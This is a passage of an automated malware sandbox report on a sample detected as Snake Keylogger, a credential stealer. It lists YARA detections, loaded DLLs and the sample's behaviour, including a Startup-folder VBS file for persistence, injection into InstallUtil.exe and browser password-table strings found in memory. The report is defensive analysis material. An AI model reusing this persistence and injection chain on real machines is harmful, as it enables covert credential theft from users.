                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: TtLlwb3ava.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Activator.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs"
                    Source: TtLlwb3ava.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: TtLlwb3ava.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.0000000002653000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002645000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002635000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002674000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002668000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2474821330.000000000358D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.0000000003183000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.0000000003160000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.0000000003190000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.0000000003150000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: TtLlwb3ava.exeVirustotal: Detection: 72%
                    Source: TtLlwb3ava.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeFile read: C:\Users\user\Desktop\TtLlwb3ava.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\TtLlwb3ava.exe "C:\Users\user\Desktop\TtLlwb3ava.exe"
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Activator.exe "C:\Users\user\AppData\Roaming\Activator.exe"
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Activator.exe "C:\Users\user\AppData\Roaming\Activator.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
